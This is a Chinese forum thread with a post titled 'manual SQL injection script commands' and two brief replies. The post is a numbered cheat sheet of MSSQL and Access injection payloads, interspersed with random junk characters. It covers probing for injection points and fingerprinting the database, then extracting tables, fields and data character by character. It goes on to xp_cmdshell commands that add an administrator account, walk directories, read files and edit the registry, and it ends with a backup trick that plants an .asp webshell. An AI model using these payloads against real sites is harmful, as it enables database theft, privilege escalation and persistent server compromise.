社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3304阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 FGy7KVR  
  2.初步判断是否是mssql ;and user>0 vTh-I&}:  
d,8V-Dk+p  
  3.注入参数是字符'and [查询条件] and ''=' `axNeqM  
3P^eD:) w  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' `i f*   
D7sw;{ns  
  5.判断数据库系统 I@pnZ-5  
c ?V,a`6  
  ;and (select count(*) from sysobjects)>0 mssql Hu1w/PLq  
A;SRm<,  
  ;and (select count(*) from msysobjects)>0 access jMW|B  
J4!Z,-  
&EE6<-B-  
8ENAif   
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 ##}a0\x|  
d0MX4bhZ  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 IR5 S-vO  
$daI++v`  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 %/1`"M5ko  
h+R}O9BD  
  9.(1)猜字段的ascii值(access) i:qc2#O:J  
0}Kl47}aD  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 p KKn  
[9[tn -  
  (2)猜字段的ascii值(mssql) |pq z(j7  
\@MGO aR]  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 +\"@2mOH{+  
WuSRA<{P  
  10.测试权限结构(mssql) azj<aaH  
Y49kq}  
Vn=J$Uv0  
_q3SR[k+`  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- )Qw|)='-  
djZOx;/  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- I".d>]16|  
D;BFl(l  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- kki]6_/n  
C UlANd"  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- P@k ;Lg"  
*Ty>-aS1  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Vxo3RwmR  
*/O6cF7  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 1V FAfv%}  
m4>v S  
  ;and 1=(select IS_MEMBER('db_owner'));-- +&(sZFW5o  
'9{H(DA  
I/XVo2Ee  
pC_2_,6$  
  11.添加mssql和系统的帐户 $Snwx  
GrVvOJr  
  ;exec master.dbo.sp_addlogin username;-- H# 2'\0u  
  ;exec master.dbo.sp_password null,username,password;-- 6CY_8/:zL  
"N7C7`izc  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- z#D@mn5\ a  
J@!Sf7k42  
  ;exec master.dbo.xp_cmdshell 'net user username password zh*NRN  
hh:0m\@<  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- _Xsn1  
J5@_OIc1y  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- mEyZ<U9  
A3C<9wXx  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ?|N:[.  
e0v&wSi  
Tg{d#U_qB  
F'pD_d9]e  
  12.(1)遍历目录 _$i9Tk  
=qI JXV  
  ;create table dirs(paths varchar(100), id int) zVl(?b&CF  
u^!-Z)W  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' rh$%*l  
dYf Vox;  
  ;and (select top 1 paths from dirs)>0 M~ynJ@q  
z4UeUVfZ}  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Pg*ZQE[ME8  
D' uzH|z8  
s x`C<c~u  
WXO@oZ!  
  (2)遍历目录 qI8{JcFx:  
xCoQ>.4p  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Ms{v;fT  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 -_b}b)2iYN  
42Kzdo|}  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 BO/2kL8*  
R4@C>\c %m  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 IF5+&O  
%z.u % %  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 z~z.J ]  
D?X97jNm  
?B@iBOcu[  
=]Qu"nRB  
  13.mssql中的存储过程 T3'dfe U  
A3Ltk 2<  
  xp_regenumvalues 注册表根键, 子键 ``>WFLWTn  
g>VkQos5"  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 `P : -a7_  
m(*CuM[E  
  xp_regread 根键,子键,键值名 _W]3_1Lu  
mgH4)!Z*56  
  ;exec xp_regread Tvf]OJ9N  
Er~5\9,/<]  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 CO4*"~']t  
BuK82   
  xp_regwrite 根键,子键, 值名, 值类型, 值 Dugr{Y/0  
BR"*-$u0;  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 P(A%z2Ql  
NrS1y"#d9  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 (MJu3t @  
=_.Zv  
  xp_regdeletevalue 根键,子键,值名 iwrdZLE  
)9L1WOGi  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 E*rDwTd  
T'f E4}rY  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 P9X/yZ42  
^[^uDE <  
=0x[Sa$&,  
X} 8rrC=  
  14.mssql的backup创建webshell >Mi A|N=  
*K-,<hJ#L  
  use model QJOP*<O  
G} }oeS  
  create table cmd(str image); >Pbd#*  
)M'#l<9B  
  insert into cmd(str) values (''); }{]{`\  
$zxCv7  
  backup database model to disk='c:\l.asp'; LT2mwJl  
Wm Od1  
|D`Zi>lv  
d-xKm2sH  
  15.mssql内置函数 {9'"!fH  
`|v0@-'$  
  ;and (select @@version)>0 获得Windows的版本号 }IEYH&4!  
SGjaH 8z  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa -pa.-@  
=We}&80 x  
  ;and (select user_name())>0 爆当前系统的连接用户 n# Z6d`  
U/|B IF  
  ;and (select db_name())>0 得到当前连接的数据库  LDwu?"P!  
?Mji'ZW}  
F!^ Y!Y@H  
;'2y6"\Y  
  16.简洁的webshell s^3t18m&1  
o` ,&yq.  
  use model TZ-n)rC)v  
B\Rq0N]' M  
  create table cmd(str image); ]'2p"A0U  
pEhWgCL  
  insert into cmd(str) values (''); !Bu<6  
|wVoJO!O}  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
欢迎提供真实交流,考虑发帖者的感受
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八